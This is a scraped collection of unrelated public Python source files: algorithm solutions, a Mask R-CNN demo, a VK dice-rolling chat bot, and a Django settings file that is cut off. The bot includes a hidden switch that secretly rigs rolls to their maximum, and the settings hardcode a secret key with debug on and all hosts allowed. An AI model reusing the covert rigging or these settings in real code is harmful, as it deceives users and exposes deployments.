879e52dfed4ab37d1d10a4a98b12823d8d3bea69 | 6ae69280ab321bf0216b898c8ff163b56ffb56b8 | /venv/Scripts/easy_install-3.6-script.py | 9f89ae8d15b482a705245dea236dc4a3a1ef6071 | [] | no_license | jvdbatista/Calculadora-Declarativa | e3894072d630b877bd94d50d8701c2f83955e9f0 | 41096b05030fe9192df10cbfabcc03b4d02b0297 | refs/heads/master | 2020-03-27T06:37:58.298370 | 2018-08-25T19:00:59 | 2018-08-25T19:00:59 | 146,121,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 454 | py | #!C:\Users\jvdba\Desktop\pd\Trabalho\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install-3.6'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install-3.6')()
)
| [
"joaodantas@softeam.com.br"
] | joaodantas@softeam.com.br |
a7e8dc33edeab6c5b14100dc09c22b6a3a0672df | 6722285224d01a5715dded488a20fdffad0e6bed | /algo/084_Largest_Rectangle_In_Histogram/Q084.py | cdcd7085993d4b9b55c99503d0547d99fcad2764 | [] | no_license | dionwang88/lc1 | 0ce1b82e7884ea7d5236e89994785cbd44afb9d5 | 54191d08bc42e5b1d403246a7486fca69d9ae30b | refs/heads/master | 2021-07-08T11:39:49.028652 | 2017-09-28T00:02:21 | 2017-09-28T00:02:21 | 105,079,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,983 | py | class Solution(object):
def largestRectangleArea(self, heights):
"""
:type heights: List[int]
:rtype: int
brute force solution
"""
if not heights:
return 0
if len(heights) == 1:
return heights[0]
localMax, globalMax = heights[0], heights[0]
for i in xrange(1, len(heights)):
length = 1
localMax = heights[i]
localMin = heights[i]
for j in xrange(i - 1, -1, -1):
localMin = min(localMin, min(heights[j + 1], heights[j]))
length += 1
localMax = max(localMin * length, localMax)
globalMax = max(globalMax, localMax)
return globalMax
def largestRectangleArea1(self, heights):
# 首先 主体思路就是对于每个bar 我们都去求出以当前的bar为最低的bar的面积 然后所有这些面积的最大值就是结果
# 在求以当前bar为最低bar的面积的时候 最难的就是要确定这个最低bar的左边界还有右边界
# stack解法就是巧妙地解决了这个问题
# 最重要的 stack里存的是索引 不是值
# stack里存的的都是递增的序列 如果碰到小于栈顶的 那么 就计算栈顶的元素的面积 这个元素的面积
# 左边界就是它自己 右边界就是这个小于它的元素 然后弹出 然后如果栈顶的还是大 那么继续计算
# 因为存的是索引 所以宽度计算都是正确的
#
# 1) Create an empty stack.
# 2) Start from first bar, and do following for every bar ‘hist[i]’ where ‘i’ varies from 0 to n-1.
# ……a) If stack is empty or hist[i] is higher than the bar at top of stack, then push ‘i’ to stack.
# ……b) If this bar is smaller than the top of stack, then keep removing the top of stack while top of the stack is greater.
# Let the removed bar be hist[tp]. Calculate area of rectangle with hist[tp] as smallest bar.
# For hist[tp], the ‘left index’ is previous (previous to tp) item in stack and ‘right index’ is ‘i’ (current index).
# 3) If the stack is not empty, then one by one remove all bars from stack and do step 2.b for every removed bar.
#
# Create an empty stack. The stack holds indexes of hist[] array
# The bars stored in stack are always in increasing order of their heights.
stack = []
max_area = 0 # Initalize max area
tp = 0 # To store top of stack
area_with_top = 0 # To store area with top bar as the smallest bar
i = 0
# Run through all bars of given histogram
while i < len(heights):
# If this bar is higher than the bar on top stack, push it to stack
if len(stack) == 0 or heights[stack[-1]] <= heights[i]:
stack.append(i)
i += 1
# If this bar is lower than top of stack, then calculate area of rectangle
# with stack top as the smallest (or minimum height) bar. 'i' is
# 'right index' for the top and element before top in stack is 'left index'
else:
tp = stack.pop()
# Calculate the area with hist[tp] stack as smallest bar
minBar = i if len(stack) == 0 else i - stack[-1] -1
area_with_top = heights[tp] * minBar
# update max area, if needed
max_area = max(max_area, area_with_top)
# Now pop the remaining bars from stack and calculate area with every popped bar as the smallest bar
while len(stack) > 0:
tp = stack.pop()
minBar = i if len(stack) == 0 else i - stack[-1] - 1
area_with_top = heights[tp] * minBar
max_area = max(max_area, area_with_top)
return max_area
# Smoke check: the largest rectangle in [2,1,5,6,2,3] has area 10.
# Portability fix: the parenthesised single-argument print call behaves
# identically under Python 2 and also runs under Python 3, whereas the
# original bare `print` statement is Python-2 only.
sol = Solution()
print(sol.largestRectangleArea1([2, 1, 5, 6, 2, 3]))
| [
"qwang8@ebay.com"
] | qwang8@ebay.com |
cc816476b8edf8aced316ed2ed77aaffef1ab329 | 792f0bb391d9d8a612908598131a980d5a5a8698 | /chapter8 additional 4.py | 04ca9eb464739e77d2ca30b09b50e2ea098a7695 | [] | no_license | Dr-Waffle19/CIS1415 | ccbb7d0ea81e8cce2531a6596c660764b285c879 | 43f243208b1d7953a7c38b4e6dd10d95c52a0588 | refs/heads/master | 2020-03-29T15:05:07.623195 | 2018-11-14T04:04:10 | 2018-11-14T04:04:10 | 150,043,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,218 | py | Student_grade = {
'Jimoh Olu': {
'test_labwork_homeworks': [87, 91, 68],
'Midterm': 80,
'Final': 91
},
'Taju Kulu': {
'test_labwork_homeworks': [99, 78.25],
'Midterm': 87,
'Final': 75
},
'Bunmi Ojo': {
'test_labwork_homeworks': [98.75, 80],
'Midterm': 40,
'Final': 75
},
}
# Interactive grade-report loop: look up a student by full name and print an
# itemized score breakdown plus an overall percentage.  Type 'exit' to quit.
# Unknown names are silently ignored and the prompt simply repeats.
user_input = input('Enter student full name: ')
while user_input != 'exit':
    if user_input in Student_grade:
        # Pull the score components out of the nested record.
        test_labwork_homeworks = Student_grade[user_input]['test_labwork_homeworks']
        midterm = Student_grade[user_input]['Midterm']
        final = Student_grade[user_input]['Final']
        # Itemized breakdown; NOTE(review): enumerate starts at 0, so the
        # first entry prints as "Homework 0", and %d truncates fractional
        # scores such as 78.25.
        for hw, score in enumerate(test_labwork_homeworks):
            print('Homework %d: %d' % (hw, score))
        print('Midterm: %s' % midterm)
        print('Final: %s' % final)
        # Overall percentage; NOTE(review): the 500-point denominator is
        # hard-coded and not derived from the number of assignments.
        total_points = sum([i for i in test_labwork_homeworks]) + midterm + final
        print('Final percentage: %f%%' % (100*(total_points / 500.0)))
    user_input = input('Enter student full name: ')
| [
"noreply@github.com"
] | Dr-Waffle19.noreply@github.com |
5d306e2738144841d68830c40dc1f04facfda53c | 4a56b5b738a88b04ff126f1dab8ff4c7baa128c1 | /61/61.py | 999374082e00ebb65cbbc3189a6338386e803fcc | [
"Unlicense"
] | permissive | vladcto/ACMP_Answers | ff6c7ba17833e33ad4bd5a97e494fef81f09751f | bc163068d7b27c5241f995da3f58a1f8c623d460 | refs/heads/master | 2022-06-16T21:15:43.026138 | 2022-06-06T18:53:29 | 2022-06-06T18:53:29 | 239,358,048 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | score = 0 # Перевес очков в какую-то команду
# Read four rounds of paired scores from stdin ("ours theirs" per line),
# accumulate the point margin into `score`, then report the result:
# DRAW on a zero margin, otherwise the number of the leading team (1 or 2).
for _ in range(4):
    parts = input().split(" ")
    score += int(parts[0]) - int(parts[1])
if score == 0:
    print("DRAW")
elif score > 0:
    print(1)
else:
    print(2)
| [
"razrab.ytka@gmail.com"
] | razrab.ytka@gmail.com |
4137b4b2fb73ef4a4cd1062ff1efe5241f4b7b91 | c5393c8558bf819bf9883583e464c364156a3cd5 | /samples/demo.py | c0686b021efa779b2f8d04bc74651e347f063f99 | [
"MIT"
] | permissive | a13544835729/Mask_RCNN | ec839e4761a628bb188f307e809e4a58ae4afd0b | c1170dc4a69b75465bd9ee14e08112e5c21431de | refs/heads/master | 2023-07-10T22:56:00.714114 | 2021-08-23T12:00:31 | 2021-08-23T12:00:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,057 | py | #!/usr/bin/env python
# coding: utf-8
# # Mask R-CNN Demo
#
# A quick intro to using the pre-trained model to detect and segment objects.
# In[1]:
import os
import sys
import random
import math
import numpy as np
import skimage.io
import matplotlib
import matplotlib.pyplot as plt
# Root directory of the project
ROOT_DIR = os.path.abspath("../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn import visualize
# Import COCO config
sys.path.append(os.path.join(ROOT_DIR, "samples/coco/")) # To find local version
import coco
#get_ipython().run_line_magic('matplotlib', 'inline')
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Local path to trained weights file
COCO_MODEL_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Download COCO trained weights from Releases if needed
if not os.path.exists(COCO_MODEL_PATH):
utils.download_trained_weights(COCO_MODEL_PATH)
# Directory of images to run detection on
IMAGE_DIR = os.path.join(ROOT_DIR, "images")
# ## Configurations
#
# We'll be using a model trained on the MS-COCO dataset. The configurations of this model are in the ```CocoConfig``` class in ```coco.py```.
#
# For inferencing, modify the configurations a bit to fit the task. To do so, sub-class the ```CocoConfig``` class and override the attributes you need to change.
# In[2]:
class InferenceConfig(coco.CocoConfig):
# Set batch size to 1 since we'll be running inference on
# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
GPU_COUNT = 1
IMAGES_PER_GPU = 1
config = InferenceConfig()
config.display()
# ## Create Model and Load Trained Weights
# In[3]:
# Create model object in inference mode.
model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
# Load weights trained on MS-COCO
model.load_weights(COCO_MODEL_PATH, by_name=True)
# ## Class Names
#
# The model classifies objects and returns class IDs, which are integer value that identify each class. Some datasets assign integer values to their classes and some don't. For example, in the MS-COCO dataset, the 'person' class is 1 and 'teddy bear' is 88. The IDs are often sequential, but not always. The COCO dataset, for example, has classes associated with class IDs 70 and 72, but not 71.
#
# To improve consistency, and to support training on data from multiple sources at the same time, our ```Dataset``` class assigns it's own sequential integer IDs to each class. For example, if you load the COCO dataset using our ```Dataset``` class, the 'person' class would get class ID = 1 (just like COCO) and the 'teddy bear' class is 78 (different from COCO). Keep that in mind when mapping class IDs to class names.
#
# To get the list of class names, you'd load the dataset and then use the ```class_names``` property like this.
# ```
# # Load COCO dataset
# dataset = coco.CocoDataset()
# dataset.load_coco(COCO_DIR, "train")
# dataset.prepare()
#
# # Print class names
# print(dataset.class_names)
# ```
#
# We don't want to require you to download the COCO dataset just to run this demo, so we're including the list of class names below. The index of the class name in the list represent its ID (first class is 0, second is 1, third is 2, ...etc.)
# In[4]:
# COCO Class names
# Index of the class in the list is its ID. For example, to get ID of
# the teddy bear class, use: class_names.index('teddy bear')
class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
# ## Run Object Detection
# In[5]:
# Load a random image from the images folder
file_names = next(os.walk(IMAGE_DIR))[2]
image = skimage.io.imread(os.path.join(IMAGE_DIR, random.choice(file_names)))
# Run detection
results = model.detect([image], verbose=1)
# Visualize results
r = results[0]
visualize.display_instances(image, r['rois'], r['masks'], r['class_ids'],
class_names, r['scores'])
# In[ ]:
| [
"issaclin32@gmail.com"
] | issaclin32@gmail.com |
1ab67da7a68a8a067bf849928740d2d0ebfd5c08 | 056d971ce27d505ab3c8905dcbd120556944b64b | /backend/scrapebookmain/manage.py | 03490de307efc043f71bd342b45f25e0e9b3b693 | [] | no_license | karan8891/Capstone | d9177e894a43a863d66792fd586ec02eb475aee4 | 88ccdab1cdf0366aba236776391ac7a9d6625fe3 | refs/heads/master | 2023-01-07T15:03:40.930225 | 2020-07-11T01:07:21 | 2020-07-11T01:07:21 | 238,735,127 | 0 | 0 | null | 2023-01-07T14:49:44 | 2020-02-06T16:38:16 | TypeScript | UTF-8 | Python | false | false | 630 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'scrapebook.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"55722488+karan8891@users.noreply.github.com"
] | 55722488+karan8891@users.noreply.github.com |
f2f47e2eae79b2c3ca8681c79deb4f957d42216c | 80c6e6e940af2c4e5ad7e4c2585a0fa017a487e7 | /ru/tts1/local/clean_text.py | 1eb93604f091dc184344e59543936f69517955db | [] | no_license | d18n/ru-tts | ce4ce8f3e7d2d41f6bfa151a7223814ea2664a3b | 6ac369249dae739b57f04778d6a6568fa238c7aa | refs/heads/master | 2022-07-01T21:23:13.218917 | 2020-05-11T13:26:28 | 2020-05-11T13:26:28 | 261,098,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | #!/user/bin/env python3
import os
import argparse
import codecs
from pathlib import Path
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("in_text", type=str, help="text to be cleaned")
parser.add_argument("out_text", type=str, help="text to be cleaned")
args = parser.parse_args()
with codecs.open(args.in_text, "r", "utf-8") as f_in, codecs.open(args.out_text, "w", "utf-8") as f_out:
for line in f_in.readlines():
id, content, _, duration = line.split("|")
id = Path(id).stem
# for now, I don't think we'll need to clean anything, but if we ever want to someday use the regular latin alphabet instead of cyrillic, it can be implemented here
f_out.write("%s %s\n" % (id, content)) | [
"dev.18n@gmail.com"
] | dev.18n@gmail.com |
77b8f2f2c93064c713fc795f1d1bc59e6d4955aa | 002f1d50850e9df9ba2c12a498ae03f8b6c563d7 | /setup.py | de63746d0d3511852b9f902b2857f9d7e52cbdfe | [
"MIT"
] | permissive | aman2457/Linked_List | 0edf1f0e49eefc0636e1f24f3cc6cabffc205b19 | d85001b80b4c23d1bae3379a5173fd5ca061380d | refs/heads/master | 2023-04-15T05:35:33.548195 | 2021-04-23T05:21:55 | 2021-04-23T05:21:55 | 360,039,284 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,193 | py | from setuptools import setup
def readme():
with open('README.md') as f:
README = f.read()
return README
setup(
name = "py_linked_list",
version = "0.0.1",
description = "A Python package which contains some methods to manipulate a linked List.",
long_description = readme(),
long_description_content_type = "text/markdown",
url = "https://github.com/aman2457/Linked_List",
download_url = "https://github.com/aman2457/Linked_List/archive/refs/heads/main.zip",
author = "Aman Kumar",
author_email = "amankumar84349@gmail.com",
license = "MIT",
keywords = ["linked list", "list", "python linked list"],
classifiers = [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Operating System :: OS Independent",
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Science/Research',
],
py_modules = ["Linked_List"],
package_dir = {'': 'src'},
include_package_data = True,
install_requires = [],
) | [
"amankumar84349@gmail.com"
] | amankumar84349@gmail.com |
1c041b692291128038daa8cc0598ddf1f15b71e7 | 980c922e73579202445a03219c7c04c393c30c78 | /视频演示代码/test/demo_face_recognize.py | ec8c23a8581f73c4debc10abd0491e3f3a4b4bf8 | [] | no_license | Yorkzhang19961122/HCI-system-for-ASD | 5a186c5fbfe0b58712df862362d09f150dac6496 | 16dea0b4ae3ececbf55819b408f3e0df3a6697e6 | refs/heads/main | 2023-03-27T08:16:30.492543 | 2021-03-11T06:23:03 | 2021-03-11T06:23:03 | 346,596,270 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,076 | py | import asyncio
from mini.apis.api_observe import ObserveFaceRecognise
from mini.apis.api_sound import PlayTTS
from mini.dns.dns_browser import WiFiDevice
from mini.pb2.codemao_facerecognisetask_pb2 import FaceRecogniseTaskResponse
from test_connect import test_connect, shutdown
from test_connect import test_get_device_by_name, test_start_run_program
# 测试, 检测到注册的人脸,则上报事件, 如果陌生人,返回"stranger"
async def test_ObserveFaceRecognise():
"""人脸识别demo
监听人脸识别事件,机器人上报识别到的人脸信息(数组)
如果是已注册的人脸,返回人脸详细信息:id,名字,性别,年龄
如果是陌生人,返回 name: "stranger"
当成功识别到人脸后,停止监听,播报"你好,xxx"(xxx为人脸信息中的name)
"""
observer: ObserveFaceRecognise = ObserveFaceRecognise()
# FaceRecogniseTaskResponse.faceInfos: [FaceInfoResponse]
# FaceInfoResponse.id, FaceInfoResponse.name,FaceInfoResponse.gender,FaceInfoResponse.age
# FaceRecogniseTaskResponse.isSuccess
# FaceRecogniseTaskResponse.resultCode
def handler(msg: FaceRecogniseTaskResponse):
print(f"{msg}")
if msg.isSuccess and msg.faceInfos:
observer.stop()
asyncio.create_task(__tts(msg.faceInfos[0].name))
observer.set_handler(handler)
observer.start()
await asyncio.sleep(0)
async def __tts(name):
await PlayTTS(text=f'你好, {name}').execute()
asyncio.get_running_loop().run_in_executor(None, asyncio.get_running_loop().stop)
if __name__ == '__main__':
device: WiFiDevice = asyncio.get_event_loop().run_until_complete(test_get_device_by_name())
if device:
asyncio.get_event_loop().run_until_complete(test_connect(device))
asyncio.get_event_loop().run_until_complete(test_start_run_program())
asyncio.get_event_loop().run_until_complete(test_ObserveFaceRecognise())
asyncio.get_event_loop().run_forever()
asyncio.get_event_loop().run_until_complete(shutdown())
| [
"15257379410@163.com"
] | 15257379410@163.com |
d2cc35b1df23ef29af004eb261a814821550e415 | 2b3fffed97ce27798cfbca24d1fb2fd6e278f3e0 | /start.py | 5449d7b3cc7efe9761e719464518380ffcc59beb | [] | no_license | sofiered/vk-dicebot-lina | c6af83b3dcf8b87ab087f5cd2d6a435a9b0689dd | ff94294346809354e25fc8c9b8525e730092ef88 | refs/heads/master | 2021-05-11T09:44:19.082527 | 2018-09-04T13:57:46 | 2018-09-04T13:57:46 | 118,085,568 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,805 | py | import asyncio
from app.bot import Bot2
import random
import re
import functools
import os
from itertools import chain
loop = asyncio.get_event_loop()
dice_regexp = r'(\d+)[d|д|к](\d+)\s*([\+|-]\d+)?'
interval_regexp = r'от\s*(\d+)\s*до\s*(\d+)?'
bot_names = ('бот', 'лина', 'народ')
peachy_ids = range(49,97)
rumka_ids = range(5582, 5630)
misti_ids = range(5701, 5745)
seth_ids = range(6109,6156)
lovely_ids = range(7096,7143)
cats_id = [cat for cat in chain(peachy_ids,
rumka_ids,
misti_ids,
seth_ids,
lovely_ids)]
def message_to_bot(func):
async def decorated_func(message):
text = message['message'].lower()
if text.startswith(bot_names):
await func(message, text)
return decorated_func
async def main():
if 'HEROKU_APP' in os.environ:
login = os.environ.get('LOGIN', '')
password = os.environ.get('PASSWORD', '')
secret_key = os.environ.get('SECRET_KEY')
admin_key = int(os.environ.get('ADMIN_KEY'))
else:
import local_settings
login = local_settings.LOGIN
password = local_settings.PASSWORD
secret_key = local_settings.SECRET_KEY
admin_key = local_settings.ADMIN_KEY
bot = await Bot2.create(login, password, loop)
def admin_only(func):
async def decorated_func(message):
if message['speaker'] == admin_key:
await func(message)
return decorated_func
@message_to_bot
async def cheat_switcher(message, text):
if secret_key in text:
bot.cheat_switch()
await bot.send_message(answer_to=message,
text=str(bot.is_cheating))
@message_to_bot
async def dice_roller(message, text):
parse_result = re.findall(dice_regexp, text)
cheat = bool('ч' in text and bot.is_cheating)
if 'дайс' in text:
await bot.send_message(answer_to=message,
text='D20: {}'.format(
random.SystemRandom().randint(1, 20) if not cheat else 20))
elif parse_result:
amount, dice, modifier = map(lambda x: int(x) if x else 0,
parse_result[0])
print("{} {} {}".format(amount, dice, modifier))
if amount > 1000 or dice > 1000:
await bot.send_message(message, "Ты наркоман? Зачем тебе столько?")
return
if amount < 1:
await bot.send_message(message, 'Зачем бросать дайс менее одного раза?')
return
if dice < 1:
await bot.send_message(message, "Я не умею бросить {}-сторонний дайс".format(dice))
return
dice_pool = [random.SystemRandom().randint(1, dice)
if not cheat else dice for _ in range(amount)]
await bot.send_message(
message,
'({}){} = {}'.format(
' + '.join(map(str, dice_pool)),
(str(modifier) if modifier < 0 else '+{}'.format(modifier))
if modifier else '',
functools.reduce(lambda x, y: x + y,
dice_pool) + modifier))
@message_to_bot
async def who_is_chosen(message, text):
if 'кто избран' in text:
chosen_one = (
random.choice(
list(
filter(
lambda x: x.get('id') != bot.get_account_id(),
await bot.get_chat_users(message['sender'])
)
)
)
)
await bot.send_message(answer_to=message,
text='{} {}, ты избран!'.format(
chosen_one.get('first_name'),
chosen_one.get('last_name')
))
@message_to_bot
async def where_is_posts(message, text):
posts_answers = [
'Сегодня будет, но позже',
'Я уже пишу',
'Вечером',
'Я хз, что писать',
'Вдохновения нет((('
]
if 'посты' in text:
await bot.send_message(answer_to=message,
text=random.choice(posts_answers))
@message_to_bot
async def send_cat(message, text):
if 'мяу' in text:
await bot.send_sticker(answer_to=message,
sticker_id=random.choice(cats_id))
@message_to_bot
async def get_advice(message, text):
want_advice = ('что делать', 'как быть', 'посоветуй', 'дай совет')
advices = [
'Если ты проявишь инициативу, успех не заставит себя ждать',
'Твои надежды и планы сбудутся сверх всяких ожиданий',
'Кто-то старается помешать или навредить тебе',
'Будь осторожен: тебя хотят обмануть!',
'Ты надеешься не напрасно!',
'Проблема внутри тебя',
'Сядь и осмотрись',
'Ты идешь не туда, надо было поворачивать налево!',
'Это ещё не все что с тобой сегодня случится',
'Хватит крутиться вокруг мира',
'Пора попросить помощи у друга',
'Нужно запастись ресурсами и построить Зиккурат',
'Время постоять в сторонке и обдумать',
'Мыслишь верно, но не так',
'Время странствий пришло к концу, ты на месте. Ура! Ура!',
'Не грусти, найдешь ещё веселье',
'Не стой, беги!',
'Ты надеешься не напрасно!',
'Ты устал, отдохни чуток',
'Ничего советовать не буду, ты и так знаешь что делать'
]
if any(keyword in text for keyword in want_advice):
await bot.send_message(answer_to=message,
text=random.choice(advices))
@message_to_bot
async def who_is_guily(message, text):
guilty = [
'Да это все массонский заговор',
'Путин, кто же еще',
'Это происки сатаны',
'Рептилоиды, они же управляют всей планетой',
'Судьба...',
'Не знаю, но точно не я!',
'Это все я, прости',
'Глобальное потепление',
'Ты сам. А кто же еще?',
'Телевизор',
'Интернет',
'Тупые школьники'
]
if 'кто виноват' in text:
if random.choice(range(10)) == 6 and message['sender'] > 2000000000:
chosen_one = (
random.choice(
list(
filter(
lambda x: x.get('id') != bot.get_account_id(),
await bot.get_chat_users(message['sender'])
)
)
)
)
await bot.send_message(answer_to=message,
text='Это {} {} во всем виноват'.format(
chosen_one.get('first_name'),
chosen_one.get('last_name')))
else:
await bot.send_message(answer_to=message,
text=random.choice(guilty))
@admin_only
@message_to_bot
async def sey_hello_to_master(message, text):
if 'привет' in text:
await bot.send_message(answer_to=message,
text='Привет, создатель')
@message_to_bot
async def info(message, text):
if 'инфа' in text:
infa = random.SystemRandom().randint(1,101)
if infa == 100:
answer = 'инфа сотка'
elif infa == 101:
answer = 'инфа 146%'
else:
answer = 'инфа %s%%' % infa
await bot.send_message(answer_to=message,
text=answer)
@message_to_bot
async def love_you(message, text):
love = ('люблю тебя', 'я тебя люблю')
if any(keyword in text for keyword in love):
if message['speaker'] == admin_key:
await bot.send_message(message, "Я тоже тебя люблю <3")
else:
await bot.send_message(message, "А я тебя нет")
@message_to_bot
async def get_help(message, text):
need_help = ('команды', 'помощь')
answer = 'Отзываюсь на Лина, Бот и Народ в начале сообщения. Регистр не важен. \r\n' \
'Кроме команды в сообщение можно добавлять любой текст. ' \
'Можно использовать несколько команд в одном сообщении, ' \
'они выполнятся в случайном порядке\r\n' \
'-- броски кубиков --\r\n' \
'команды в формате 2д4, 1d12 или 3к6. Можно прибавлять и вычитать модификаторы, например, 1д12 +3\r\n' \
'команда "дайс" это то же самое, что и 1d20 \r\n' \
'-- другие команды --\r\n' \
'"рандом от X до Y" возвращает случайное число в заданных границах \r\n' \
'"кто избран" указывает на случайного человека в беседе. Не работает в личных сообщениях\r\n' \
'"кто виноват" поможет найти причину всех бед\r\n' \
'"посты" объясняет, почему никто ничего не пишет\r\n' \
'"инфа" определит степень достоверности факта\r\n' \
'"мяу" покажет случайный стикер с котиком'
if any(keyword in text for keyword in need_help):
await bot.send_message(answer_to=message,
text=answer)
@message_to_bot
async def interval_random(message, text):
if 'рандом' in text:
parse_result = re.findall(interval_regexp, text)
if parse_result:
min, max = map(lambda x: int(x), parse_result[0])
if min > max:
min, max = max, min
value = random.SystemRandom().randint(min, max)
await bot.send_message(message, "(от {} до {})={}".format(min,
max,
value))
bot.add_handler(handler=dice_roller)
bot.add_handler(handler=cheat_switcher)
bot.add_handler(handler=where_is_posts)
bot.add_handler(handler=send_cat)
bot.add_handler(handler=get_advice)
bot.add_handler(handler=who_is_guily)
bot.add_handler(handler=sey_hello_to_master)
bot.add_handler(handler=info)
bot.add_handler(handler=get_help)
bot.add_handler(handler=love_you)
bot.add_handler(handler=interval_random)
bot.add_handler(handler=who_is_chosen, message_type=bot.STATUSES['CONF'])
await bot.start()
loop.run_until_complete(main())
| [
"p.tihachev@uiscom.ru"
] | p.tihachev@uiscom.ru |
dbfc227659f42dc45de529130cd75d359d724e08 | 02a6085953bc002baa44fd43e7ba29f92fd787c7 | /books/settings.py | d86cc98cef9e4bfc65a54a9bdfec0571d7f903e6 | [] | no_license | dzmitry-babak-idf/spd-book | cbab520af986aa3acccb5690f63c116cf3591788 | e6ab073d23b0152174d032625ce87356a86fa167 | refs/heads/master | 2023-01-07T01:31:56.471204 | 2020-10-30T13:20:35 | 2020-10-30T13:20:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,078 | py | """
Django settings for books project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'a#u_9)&)n9@3-@jp0kju%lno6s!*91vtj*35ifmgixsyzoqe*h'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'debug_toolbar',
'social_django',
'store',
]
INTERNAL_IPS = [
# ...
'127.0.0.1',
# ...
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
'debug_toolbar_force.middleware.ForceDebugToolbarMiddleware',
]
ROOT_URLCONF = 'books.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'books.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.getenv('books_project_db_name'),
'USER': os.getenv('books_project_db_user'),
'PASSWORD': os.getenv('books_project_db_pass'),
'HOST': os.getenv('books_project_db_host'),
'PORT': os.getenv('books_project_db_port'),
}
}
AUTHENTICATION_BACKENDS = (
'social_core.backends.github.GithubOAuth2',
'django.contrib.auth.backends.ModelBackend',
)
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
),
'DEFAULT_PARSER_CLASSES': (
'rest_framework.parsers.JSONParser',
)
}
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
